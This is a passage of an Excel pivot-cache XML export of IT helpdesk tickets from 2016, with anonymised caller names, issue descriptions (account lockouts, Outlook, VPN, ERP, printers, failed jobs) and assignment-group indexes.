    <s v="outlook not updating ; crashing intermittently"/>
    <s v="outlook not updating ; crashing intermittently"/>
    <s v="wipzvlug urmdkgpa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_175: dev/SID_36data4a the space has been used to 98 %."/>
    <s v="HostName_175: dev/SID_36data4a the space has been used to 98 %._x000d__x000a_HostName_175: dev/SID_36data3a the space has been used to 98 %._x000d__x000a_"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="1"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0449233"/>
    <s v="ticket update on ticket_no0449233"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="from: sbgvrncj idfhtoqv _x000a_sent: thursday, october 13, 2016 9:02 pm_x000a_to: przcxbml vnjdghui; nwfodmhc exurcwkm_x000a_cc: jywvemun qngschtz_x000a_subject:  re: synchronization iphone with outlook_x000a__x000a_hi thsgy,_x000a_yes this option is available._x000a_gso,_x000a_please open a ticket for this and i approve._x000a_many "/>
    <s v="przcxbml vnjdghui"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to  assistant programdnty in nx"/>
    <s v="need access to  assistant programdnty in nx"/>
    <s v="ajdcnwtb bvijwxko"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to login to collaboration_platform with email address and password"/>
    <s v="unable to login to collaboration_platform with email address and password"/>
    <s v="aeykqxlr brpdswvu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email delegation"/>
    <s v="i would like to have todthyd renytrner email forwarded to myself. todthyd has accepted the vsp and i will be assuming his duties."/>
    <s v="xziwkgeo gdiraveu"/>
    <x v="26"/>
  </r>
  <r>
    <s v="windows account unlock"/>
    <s v="windows account unlock"/>
    <s v="gvdkupew waphsuen"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hpqc - initialization error"/>
    <s v="trying to access hpqc _x000d__x000a__x000d__x000a_error:_x000d__x000a_initialization has failed.  contract your system administrator.  for details, see the loader log file._x000d__x000a_failure details:_x000d__x000a_"/>
    <s v="erckhtzj tdmkgoie"/>
    <x v="2"/>
  </r>
  <r>
    <s v="static issue on phone..interaction id : 1064826347"/>
    <s v="static issue on phone..interaction id : 1064826347"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="gakceqyb edrjthvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access ap remote or eu remote while na remote is down fjaqbgnld yukdzwxs"/>
    <s v="when i try to access either one i receive the message that &quot;this page can't be displayed.&quot;"/>
    <s v="gakceqyb edrjthvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool  not opening"/>
    <s v="engineering_tool  not opening"/>
    <s v="ibsywxpc icxhsbfv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email activation on company provided device"/>
    <s v="email activation on company provided device"/>
    <s v="rqfmcjak gcxvtbrz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uypsqcbm.fqpybgri@gmail.com_x000d__x000a__x000d__x000a_hi sir/ma'am_x000d__x000a__x000d__x000a_refer below screenshot and help me out. urgent!_x000d__x000a__x000d__x000a_[cid:image001.jpg@01d2258d.0SID_29acb0]_x000d__x000a__x000d__x000a_"/>
    <s v="axdyfojg nyjlxbsk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="office asking for license key"/>
    <s v="office asking for license key"/>
    <s v="cjsukemx lqkcesuf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp inbox, ich bin nicht im workcenter nr. 51111937 = pe_emea_fu3 = aerospace gruppe eingetragen"/>
    <s v="workflow meiner gruppe fÃ¼r mich nicht sichtbar , nicht im workcenter nr. 51111937 = pe_emea_fu3 = aerospace gruppe eingetragen_x000a__x000a_"/>
    <s v="xsnrlygw nmqyraec"/>
    <x v="12"/>
  </r>
  <r>
    <s v="engineering_tool company and company not working "/>
    <s v="engineering_tool company and company not working "/>
    <s v="shkwgxln ikpvtjgn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to save docs on t drive. internet not working"/>
    <s v="unable to save docs on t drive. internet not working"/>
    <s v="rjwbntef nmuikjgo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open excel file from collaboration_platform"/>
    <s v="name:wqxzleky uwjchqor_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:wqxzleky.uwjchqor@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:cannot open files in collaboration_platform, get message that server isn't responding.  location of files:  "/>
    <s v="wqxzleky uwjchqor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage : company-na-usa-usa-anira-rtr01 is down since 10/13 at 9:58 am est site is up on backup circuit"/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _________     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___10/13 at 9:58 am ___________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __no__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yes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x v="7"/>
  </r>
  <r>
    <s v="res: ticket_no1558759 -- register - ie rj  tax code- in erp SID_34"/>
    <s v="_x000a__x000a_received from: lokiwfhg.udkoqrcg@gmail.com_x000a__x000a_hi ramdntyassthywamy,_x000a_any status on this?_x000a_"/>
    <s v="lokiwfhg udkoqrcg"/>
    <x v="9"/>
  </r>
  <r>
    <s v="msd crm popup when try to lunch outlook and outlook freezing "/>
    <s v="msd crm popup when try to lunch outlook and outlook freezing "/>
    <s v="gbirhjat fptbrhwv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to edit in collaboration_platform"/>
    <s v="name : budighfl izbxvary_x000a__x000a_browser : microsoft internet explorer_x000a__x000a_email : budighfl.izbxvary@gmail.com_x000a__x000a_telephone : _x000a__x000a_summary : i cannot edit_x000a__x000a__x000a_"/>
    <s v="budighfl izbxvary"/>
    <x v="15"/>
  </r>
  <r>
    <s v="ms crm emails not coming to outlook "/>
    <s v="ms crm emails not coming to outlook "/>
    <s v="ghfvmpqi fehkscza"/>
    <x v="39"/>
  </r>
  <r>
    <s v="unable to login to ethics"/>
    <s v="unable to login to ethics"/>
    <s v="ekracmdp yphqstfj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for-inplant_866222"/>
    <s v="ticket update for-inplant_866222"/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="secure logon does not work"/>
    <s v="when try and initialize secure logon get message username or password incorrect. logged on earlier this morning and it worked fine. phone "/>
    <s v="otagsuzp xazhusry"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out : windows "/>
    <s v="account locked out : windows "/>
    <s v="wjsfbpuv lcpdfihr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="ndrtahvm kjhdybzm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="account locked"/>
    <s v="vgzmjkop rgeubdco"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket query regarding : ticket_no0447258"/>
    <s v="ticket query regarding : ticket_no0447258"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook"/>
    <s v="unable to open outlook"/>
    <s v="naehwsgr guwlzejm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="zjuciaxv przcfied"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the new iphone 6s is not getting quaraintined."/>
    <s v="the new iphone 6s is not getting quaraintined."/>
    <s v="jkraueqn gthlexzo"/>
    <x v="28"/>
  </r>
  <r>
    <s v="having issues with outlook"/>
    <s v="having issues with outlook"/>
    <s v="otpkzifh gywinoml"/>
    <x v="18"/>
  </r>
  <r>
    <s v="i need accsess to this link."/>
    <s v="_x000d__x000a__x000d__x000a_received from: rcmziuob.xhblozqe@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i need accses to this report._x000d__x000a__x000d__x000a_\\HostName_702\departments\pubreports\fy17&lt;file://HostName_702/departments/pubreports/fy17&gt;_x000d__x000a_[cid:image001.png@01d22559.75e00b60]_x000d__x000a_vielen dank_x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="rcmziuob xhblozqe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2: outlook freezing."/>
    <s v="vip 2: outlook freezing."/>
    <s v="ihozauxs ohdqmipz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account lockout "/>
    <s v="account lockout "/>
    <s v="tqjsmwvk arqoytbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please update change for user &quot;giuliasana byhdderni&quot; from &quot;company.com to company.com&quot;"/>
    <s v="change for user &quot;giuliasana byhdderni&quot; from &quot;company.com to company.com&quot;"/>
    <s v="vpityxbu qktwepmz"/>
    <x v="19"/>
  </r>
  <r>
    <s v="telephony_software phone"/>
    <s v="benelthyux team has bad phone connection of incomming calls. a lot of crackling and interruption."/>
    <s v="xdtiwshm ijyrtulh"/>
    <x v="6"/>
  </r>
  <r>
    <s v="probleme mit lan am rechner \ we_wu113 \ essa \wrcktgbd wzrgyunp"/>
    <s v="probleme mit lan am rechner \ we_wu113 \ essa \wrcktgbd wzrgyunp"/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="pdf dateien gehen nicht auf"/>
    <s v="pdf dateien gehen nicht auf"/>
    <s v="fiwaltqr utykjmwi"/>
    <x v="32"/>
  </r>
  <r>
    <s v="unable to re print inwarehouse_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000d__x000a__x000d__x000a_hi it team_x000d__x000a__x000d__x000a_kindly please assist as we unable to reprint inwarehouse_tool in ecs system._x000d__x000a__x000d__x000a_the system just show below attached only without any other detail._x000d__x000a__x000d__x000a_[cid:image002.png@01d22583.967eedd0]_x000d__x000a__x000d__x000a_[cid:image001.png@01d22583.4d17baf0]_x000d__x000a__x000d__x000a__x000d__x000a_hydstheud mddwwyleh_x000d__x000a_operation supervisor_x000d__x000a_company distribution services of asia pte ltd_x000d__x000a_( asia regional distribution centre)_x000d__x000a_5 changi south lane_x000d__x000a_# 04-01,  c &amp; p building_x000d__x000a_apac 486045_x000d__x000a_t :  +65 6379 4571_x000d__x000a_f : +65 6546 5504_x000d__x000a_m : +65 9459 1605_x000d__x000a_email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="18"/>
  </r>
  <r>
    <s v="cannot find workgroups in telephony_software"/>
    <s v="i cannot find 2/de/fd/gso/de/v as well as  2/de/fd/gso/de/c in telephony_software. i had access until atleast last week and possibly on monday too."/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="6"/>
  </r>
  <r>
    <s v="wireless mouse is missing from desk"/>
    <s v="wireless mouse is missing from desk, need new replaced wireless mouse."/>
    <s v="qkmgtnla buraxcij"/>
    <x v="2"/>
  </r>
  <r>
    <s v="msd -unable to sync all the contact information from outlook to crm"/>
    <s v="unable to sync all the contact information from outlook to crm. the address and notes  fields are not synced to crm as there are more then 4500 contacts its not possible to put the company name for each customer manually_x000a__x000a_contact number- "/>
    <s v="crjhotyk pxslorbe"/>
    <x v="22"/>
  </r>
  <r>
    <s v="probleme mit portal \ user : gogtyekthyto \vzqomdgt jwoqbuml"/>
    <s v="probleme mit portal \ user : gogtyekthyto \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="re: inc1547248- logging into mii supervisor dashbankrd results in error pop-up.. 'internal server error'"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wsabzycm.pbhrmnyz@gmail.com_x000d__x000a__x000d__x000a_hi stefyty,_x000d__x000a__x000d__x000a_recent we have moved some changes to improve the performance._x000d__x000a_can you please check if you are still getting the same issue._x000d__x000a__x000d__x000a_"/>
    <s v="wsabzycm pbhrmnyz"/>
    <x v="40"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/13/2016 04:58:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/13/2016 04:58:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="automatical stock transfers shows wrong (tool late) delivery date; route the ticket forward to supply_chain team please "/>
    <s v="hello,_x000d__x000a__x000d__x000a_we have again the problem with wrong (too late) automaticaly created stock stransfers. the delivery date is too late._x000d__x000a_#4195579 need at plant_223 on 15 nov., 5019339763/00001 shows delivery date 17 nov._x000d__x000a_the parts are available at plant_105._x000d__x000a_why dosen't show the stock transfer the wrong delivery date?_x000d__x000a__x000d__x000a_we had the same problem with #4457992 - 5019250478_x000d__x000a_the issue needs to solved a.s.a.p._x000d__x000a_"/>
    <s v="yfmaqovp wdonhbez"/>
    <x v="5"/>
  </r>
  <r>
    <s v="ethics training course"/>
    <s v="_x000d__x000a__x000d__x000a_received from: aunkpchr.qsyvrmjl@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_every quarter when the course has been added, it does not appear in my current learning._x000d__x000a_i'll have to find out the course name from my team mates and check in the &quot;browse&quot; option._x000d__x000a_could you please help to resolve this issue permanently.._x000d__x000a__x000d__x000a_best "/>
    <s v="aunkpchr qsyvrmjl"/>
    <x v="23"/>
  </r>
  <r>
    <s v="drucker em93 macht willkÃ¼rlich flecken auf den ausdrucken/kopien !!!"/>
    <s v="drucker em93 macht willkÃ¼rlich flecken auf den ausdrucken/kopien !!!"/>
    <s v="ltxzfcgm sxvigclz"/>
    <x v="41"/>
  </r>
  <r>
    <s v="company-eu-deu-germany-e-b2-f2-new-office-3550-access-sw01 power supply issue."/>
    <s v="internal power supply - on   company-eu-deu-germany-e-b2-f2-new-office-3550-access-sw01 (68.20.26.7986) is showing faulty_x000d__x000a__x000d__x000a__x000d__x000a_company-eu-deu-germany-e-b2-f2-new-&gt;sh env all_x000d__x000a_fan is ok_x000d__x000a_temperature is ok_x000d__x000a_power is faulty_x000d__x000a_rps is not present _x000d__x000a_"/>
    <s v="bozdftwx smylqejw"/>
    <x v="3"/>
  </r>
  <r>
    <s v="computer check"/>
    <s v="_x000a__x000a_received from: qhyoiwls.uynrhiva@gmail.com_x000a__x000a_hi,_x000a__x000a_please check my computer â€“ excel runs slowly !_x000a__x000a_[cid:image001.png@01d22538.3ed1aa50]_x000a_[cid:image002.png@01d22539.ccb60450]_x000a__x000a_[cid:image003.png@01d2253a.835b8630]_x000a__x000a_qhyoiwls uynrhiva_x000a_analyst planning &amp; reporting_x000a_qhyoiwls.uynrhiva@gmail.com_x000a__x000a__x000a_company shared services gmbh_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq_x000a__x000a_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qhyoiwls uynrhiva"/>
    <x v="28"/>
  </r>
  <r>
    <s v="reset the password for xaykwtrf amlswjfr on erp / produktion / erp"/>
    <s v="reset the password for xaykwtrf amlswjfr on erp / produktion / erp"/>
    <s v="xaykwtrf amlswjfr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit lan \youfzmgp xvysrnmb"/>
    <s v="probleme mit lan \youfzmgp xvysrnmb"/>
    <s v="youfzmgp xvysrnmb"/>
    <x v="24"/>
  </r>
  <r>
    <s v="no vpn connection my employee p. financial."/>
    <s v="name:jvxtfhkg heptuizn_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:jvxtfhkg.heptuizn@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:no vpn connection my employee p. financial._x000a__x000a____________________x000a__x000a_ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_dwfiykeo argtxmvcumar3_x000a_ hello_x000a_ is it petrghada financial?_x000a_jvxtfhkg heptuizn_x000a_ no it's pethrywr financial_x000a_dwfiykeo argtxmvcumar3_x000a_ ok_x000a_jvxtfhkg heptuizn_x000a_ can you call him, it's urgent_x000a__x000a_dwfiykeo argtxmvcumar3_x000a_ ok will do it_x000a_jvxtfhkg heptuizn_x000a_ "/>
    <s v="jvxtfhkg heptuizn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç­”å¤: ticket_no1559458 : wireless guest access- hr_tool trainer"/>
    <s v="_x000a__x000a_received from: krnzfoct.mnjbuedp@gmail.com_x000a__x000a_hi ,_x000a__x000a_well received._x000a__x000a_"/>
    <s v="krnzfoct mnjbuedp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi connection is intermittent (getting frequently disconnected) in india."/>
    <s v="wifi connection is intermittent (getting frequently disconnected) in india._x000a_contact : _x000a_intranet is getting affected._x000a_"/>
    <s v="ykcvjwax cfigbjuo"/>
    <x v="7"/>
  </r>
  <r>
    <s v="[erp] reroute production order printer mp74 to mp82"/>
    <s v="production order printer mp74 (10.16.77.212) needs to be routed to mp82 (10.16.77.222)_x000d__x000a__x000d__x000a_-&gt; all erp systems including drawings etc._x000d__x000a__x000d__x000a_unable to find printer mp82 (in ticketing_tool, ad and erp_print_tool)_x000d__x000a_rerouted priter with name prqmp82 did not work."/>
    <s v="xvwchsdg pladjmxt"/>
    <x v="4"/>
  </r>
  <r>
    <s v=":network problem in india office"/>
    <s v="telephone:_x000a_summary:network problem in india_x000a__x000a_________________x000a__x000a_ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_dwfiykeo argtxmvcumar3_x000a_ hello, "/>
    <s v="ruhvqcwz kdqzlijw"/>
    <x v="3"/>
  </r>
  <r>
    <s v="reset passwords for usa feathers using password_management_tool password reset."/>
    <s v="the"/>
    <s v="lmqysdec ljvbnpqw"/>
    <x v="16"/>
  </r>
  <r>
    <s v="missing punches"/>
    <s v="hello, there are punches out missing in erp for the employees that ended night shift today in the morning. location: germany, germany  machining. please, help."/>
    <s v="qwghibcf uptkgzbe"/>
    <x v="51"/>
  </r>
  <r>
    <s v="upgrade pc ramdnty"/>
    <s v="i raised a ticket to upgrade the system ramdnty.  can mine be upgrade to 8gb?_x000a_assign to sridthshar herytur."/>
    <s v="nrugzxkl lohqkvry"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ticket_no1559458 : wireless guest access- hr_tool trainer"/>
    <s v="_x000a__x000a_received from: aorthyme.rnsuipbk@gmail.com_x000a__x000a_hi _x000a__x000a_please find below the credentials of guest access for annyhtie zhothu._x000a__x000a_[cid:image001.jpg@01d2254c.ce0f3110]_x000a__x000a_"/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="_x000d__x000a_this link can not be open"/>
    <s v="_x000d__x000a_this link can not be open"/>
    <s v="vroxskje bixtmefd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="grir issues plant_322 for ice alt. routes from usa"/>
    <s v="email from maryhtutina bauuyternfeyt to athyndy eartyp to review alternate route shipments from 1204 from us warehouse and discrepancy in postings._x000a__x000a_5018873735 00001: inwarehouse_tool has been cancelled, please cancel gr as well, no delivery note_x000a_5018080021 00001: inwarehouse_tool has been cancelled, please cancel gr as well, no delivery note_x000a_5019195890 00001: inwarehouse_tool has been cancelled, please cancel gr as well, no delivery note_x000a_"/>
    <s v="cbligfne wmoxktnj"/>
    <x v="52"/>
  </r>
  <r>
    <s v="account blocked"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kmzwjdsb.ejgnafcy@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_could you help me unlock my account._x000d__x000a_i can not get through _x000d__x000a_"/>
    <s v="kmzwjdsb ejgnafcy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="datenÃ¼bertragung nicht mÃ¶glich!"/>
    <s v="keine datenÃ¼bertragung von pc auf maschine mÃ¶glich!_x000a__x000a_werk: plant_107_x000a_workcenter: ebm052_x000a_maschine: 45162335 /03_x000a_pc: eemwx004016_x000a_programdntym: winprodnc_x000a__x000a_ansprechpartner: r. wunthyder"/>
    <s v="ajiqfrkz dolmpkqf"/>
    <x v="41"/>
  </r>
  <r>
    <s v="ess portal"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ygkzwsud.cvjgkxws@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am unable to log in to bex website through ess portal. please help._x000d__x000a__x000d__x000a_"/>
    <s v="ygkzwsud cvjgkxws"/>
    <x v="0"/>
  </r>
  <r>
    <s v="current learning - ethics"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bcxpeuko.utorqehx@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_oct is the month where we usually gets new ethics training course._x000d__x000a_this time, i didn't receive any ethics mail and also my current learning is empty. but few of my colleagues got the mail to complete the course._x000d__x000a_is it that this time, i don't  need to complete the course?_x000d__x000a__x000d__x000a_"/>
    <s v="bcxpeuko utorqehx"/>
    <x v="23"/>
  </r>
  <r>
    <s v="ç”µè„‘æ— æ³•æ‰“å¼€ç½‘é¡µã€‚"/>
    <s v="å¼ å·¥æ‚¨å¥½ï¼_x000d__x000a_æˆ‘çš„ç”µè„‘è¿žæŽ¥å…¬å¸ç½‘ç»œæ— æ³•ä½¿ç”¨ï¼ˆä½†163ç­‰æ­£å¸¸ï¼‰ï¼Œä¿¡æ¯å¦‚ä¸‹ï¼šï¼ˆcrmæ— æ³•ç™»é™†ï¼Œvpnæ— æ³•è¿žæŽ¥ï¼Œethicsæ— æ³•è¿žæŽ¥ï¼Œä½†é‚®ä»¶å¯ä»¥æ­£å¸¸æŽ¥æ”¶ï¼‰_x000d__x000a_å¦‚ä½•è§£å†³ï¼Ÿ_x000d__x000a_ _x000d__x000a__x000d__x000a_"/>
    <s v="tmufgokq qtzavows"/>
    <x v="31"/>
  </r>
  <r>
    <s v="production order cannot be released - 115991131"/>
    <s v="hello it,_x000d__x000a__x000d__x000a_production order cannot be released - 226002242 - &quot;cer1 is active&quot; &quot;the business ta cannot be carried out&quot;. _x000d__x000a_please see attached screenshot._x000d__x000a__x000d__x000a_please solve aerp. shipment has to be done today._x000d__x000a__x000d__x000a_"/>
    <s v="vujymcls sgpmyviq"/>
    <x v="44"/>
  </r>
  <r>
    <s v="usa warehouse:long distance service down"/>
    <s v="from:  mdghayi redytudy _x000a_sent: wednesday, october 12, 2016 11:02 am_x000a_to: zarlgjes nxjvzcta; datacenter_x000a_cc: tiyhum kuyiomar_x000a_subject: re: long distance service down_x000a__x000a_hello dac,_x000a__x000a_there is an alarm on one of circuit id dhec027838 at usa. please can you open a ticket with global_telecom_1 and co-ordinate._x000a__x000a_"/>
    <s v="jvhqyamt wodzrcjg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="vhqgbpik fkvigjbu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="payment method change from &quot;t&quot; to &quot;c&quot; for all employee vendors in 5323 &amp; 5330"/>
    <s v="_x000a_from: gnasmtvx cwxtsvkm _x000a_sent: wednesday, october 12, 2016 12:51 pm_x000a_to: nathyresh gayhtjula_x000a_cc: rwuqydvo anecdfps; pradyhtueep yyufs_x000a_subject: re: apt run_x000a__x000a_hi nathyresh,_x000a__x000a_we request you to change the payment method as c instead of t for all the employee masters._x000a__x000a_"/>
    <s v="gnasmtvx cwxtsvkm"/>
    <x v="9"/>
  </r>
  <r>
    <s v="anti-fmxcnwpu tcwrdqboinition is not updated from long time"/>
    <s v="anti-fmxcnwpu tcwrdqboinition is not updated from long time. attached the screenshot."/>
    <s v="ldsjntax eqozfasc"/>
    <x v="49"/>
  </r>
  <r>
    <s v="job Job_1329 failed in job_scheduler at: 10/13/2016 00:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1329 failed in job_scheduler at: 10/13/2016 00:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="pricing condition issue in oa"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rayhtukumujar.br2@company.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_in the recent past, we are facing an issue of pricing condition not getting changed while booking the order._x000d__x000a__x000d__x000a_though we override the pricing condition with znr, the pricing condition remains as zlp1 only._x000d__x000a__x000d__x000a_for example, in oa 36131265, the price was over written with znr condition with a nett price of rs. 5726.54.  but still pricing condition is shown as zlp1 with standard discount._x000d__x000a__x000d__x000a_what we have observed is whenever there are sub delivery items created due to non-availability of stock, this issue crops up.  that too, after the challan is created, it becomes too difficult to make any changes._x000d__x000a__x000d__x000a_we request you to look into this immediately, assign sev2 ticket and resolve the same._x000d__x000a__x000d__x000a_await your feedback._x000d__x000a__x000d__x000a_à²•à³ƒà²¤à²œà³à²žà²¤à³†à²—à²³à³  / with "/>
    <s v="fgdsvija qvixmubh"/>
    <x v="12"/>
  </r>
  <r>
    <s v="need network connection for alicona edgemaster at pu5"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vtwxaefm.ljisafue@gmail.com_x000d__x000a__x000d__x000a_it helpdesk,_x000d__x000a__x000d__x000a_please provide network connection for alicona edgemaster hone measuring equipment installed in pu5._x000d__x000a__x000d__x000a_this is necessary for software updating and also for shatryung relevant information with global team._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vtwxaefm ljisafue"/>
    <x v="18"/>
  </r>
  <r>
    <s v="the printer is defaulting to the usa printer for delivery notes.  need to take the default out so it defaults to  "/>
    <s v="from: kryuisti turleythy _x000a_sent: wednesday, october 12, 2016 11:30 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: rakthyesh fw: delivery note for bakyhrer huhuyghes_x000a__x000a_please see string of emails on an issue that is happening with the transfer of shipping materials that used to be shipped from usa to now being shipped from usa and usa.  the printer is defaulting to the usa printer for delivery notes.  need to take the default out so it defaults to the shipping plant.  please let me know if you need more information.    i do not know what is triggering it to print from usa printer.  having same issue in usa.  _x000a__x000a_kryuisti turleythy_x000a_usa site business manager_x000a_hybiaxlk.lawptzir@gmail.com_x000a__x000a_from: kryuisti turleythy _x000a_sent: wednesday, october 12, 2016 10:39 am_x000a_to: ebpwcfla qoxvpbam &lt;zdgnlqkc.zfjbpntg@gmail.com&gt;_x000a_cc: gmnhjfbw farnwhji &lt;gmnhjfbw.farnwhji@gmail.com&gt;_x000a_subject: re: delivery note for bakyhrer huhuyghes_x000a__x000a_so, the issue is that for some reason it is defaulting to a usa printer for the delivery note.   what is your printer number and i will send it to the printer?  for future orders, before you save the delivery, go to extraïƒ delivery outputïƒ  header and change the printer in communication method. _x000a__x000a_kryuisti turleythy_x000a_usa site business manager_x000a_hybiaxlk.lawptzir@gmail.com_x000a__x000a__x000a_from: ebpwcfla qoxvpbam _x000a_sent: wednesday, october 12, 2016 9:07 am_x000a_to: kryuisti turleythy &lt;hybiaxlk.lawptzir@gmail.com&gt;_x000a_subject: re: delivery note for bakyhrer huhuyghes_x000a__x000a_item # 6970497 so# 36119918 line 490. picking request #6671926 delivery# 9169565916_x000a__x000a_from: kryuisti turleythy _x000a_sent: wednesday, october 12, 2016 10:41 am_x000a_to: ebpwcfla qoxvpbam_x000a_subject: re: delivery note for bakyhrer huhuyghes_x000a__x000a_can you give me an order number?_x000a__x000a__x000a_kryuisti turleythy_x000a_usa site business manager_x000a_hybiaxlk.lawptzir@gmail.com_x000a__x000a_from: ebpwcfla qoxvpbam _x000a_sent: wednesday, october 12, 2016 8:20 am_x000a_to: kryuisti turleythy &lt;hybiaxlk.lawptzir@gmail.com&gt;_x000a_subject: delivery note for bakyhrer huhuyghes_x000a__x000a_hi kryuisti,_x000a__x000a_                i'm trying to ship out an order for bakyhrer huhuyghes , i have a picking request but i am unable to print out a delivery note._x000a_is there any way you can help me with this kenny does not know._x000a__x000a_"/>
    <s v="hybiaxlk lawptzir"/>
    <x v="17"/>
  </r>
  <r>
    <s v="folder missing"/>
    <s v="_x000a__x000a_received from: munxvfhw.texsbopi@gmail.com_x000a__x000a_dear sir,_x000a__x000a_pkj folder is missing in u:guest:  u is HostName_95_x000a__x000a_prakaythsh kujigalore_x000a_senior manager, engineering_x000a_munxvfhw.texsbopi@gmail.com&lt;mailto:munxvfhw.texsbopi@gmail.com&gt;_x000a__x000a_"/>
    <s v="munxvfhw texsbopi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account frequently getting locked."/>
    <s v="windows account frequently getting locked."/>
    <s v="wyxqkzmf urigtqnp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_568 failed in job_scheduler at: 10/12/2016 22:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_568 failed in job_scheduler at: 10/12/2016 22:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bkwin_HostName_770_inc failed in job_scheduler at: 10/12/2016 22:13:00  "/>
